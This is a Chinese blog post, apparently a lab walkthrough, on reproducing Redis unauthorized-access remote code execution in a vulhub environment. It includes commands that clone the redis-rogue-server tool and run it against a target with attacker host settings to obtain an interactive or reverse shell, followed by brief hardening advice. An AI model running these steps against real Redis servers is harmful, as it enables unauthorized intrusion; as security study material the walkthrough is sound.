Redis未授权访问利用RCE进行漏洞复现

前言:小编也是现学现卖,方便自己记忆,写的不好的地方多多包涵,希望各位大佬多多批评指正。


漏洞概述

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
Redis在默认情况下,会绑定6379这个端口,如果服务器没有采用限制IP访问或在防火墙做策略,就会将Redis服务暴露在公网上,并且在没有设置密码认证的情况下(既然有密码也可进行爆破),会导致用户未授权访问,可能导致,SSH远程登录,写入webshell,交互式shell,反弹shell等操作。

影响版本

Redis 2.x,3.x,4.x,5.x

环境搭建和漏洞复现

一台Ubuntu装好vulhub虚拟机(此漏洞推荐使用Centos系统进行测试),且安装下载好 vulhub靶场,ip地址 :192.168.0.115
如何安装vulhub,参考官方文档

一台kali虚拟机,ip地址:192.168.0.111


1.环境启动

cd /vulhub/redis/4-unacc   //这里须进入绝对路径下,具体以下载版本为准。
docker-compose up -d    //启动环境,需花费一点时间
docker ps         //查看开启的漏洞环境

在这里插入图片描述
kali 访问 :192.168.0.115:6379,漏洞启动成功。

在这里插入图片描述


2.下载使用RCE

这里推荐下载github上的 RCE地址
推荐这个的原因是已存在 .so文件不需要去其他地方下载或者编译。

可直接用kali下载。

git clone https://github.com/n0b0dyCN/redis-rogue-server.git
cd redis-rogue-server
ls

在这里插入图片描述

RCE使用。

python3 redis-rogue-server.py -h    //查看使用命令
python3 redis-rogue-server.py --rhost 192.168.0.115 --rport 6379 --lhost 192.168.0.111 --exp exp.so  //这里通过帮助构造命令,rhost,rport为靶机的ip和端口,lhost为kali ip地址。

在这里插入图片描述
交互模式使用:输入字母 i 即可。
在这里插入图片描述
反弹shell模式:需提前监听好端口,后按字母 r 输入kali的ip和端口(默认21000)即可。

在这里插入图片描述注意:这里如果出现连接不上交互或者反弹shell的模式,可能是虚拟机是Ubuntu的问题,也可能是靶场本身存在问题,可以重启靶机或关闭靶场环境在开启。

小编这里就没尝试:写入ssh-keygen公钥然后使用私钥登陆,定时任务反弹shell,写入webshell等操作了,因靶场环境是Ubuntu的原因,所以推荐使用 Centos系统进行复现。

漏洞防御

如要开启远程连接,服务器一定要开启protected-mode(保护模式)设置ip白名单。
修改连接redis的密码,密码满足3/4原则。
修改默认端口6379 为其它端口。
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值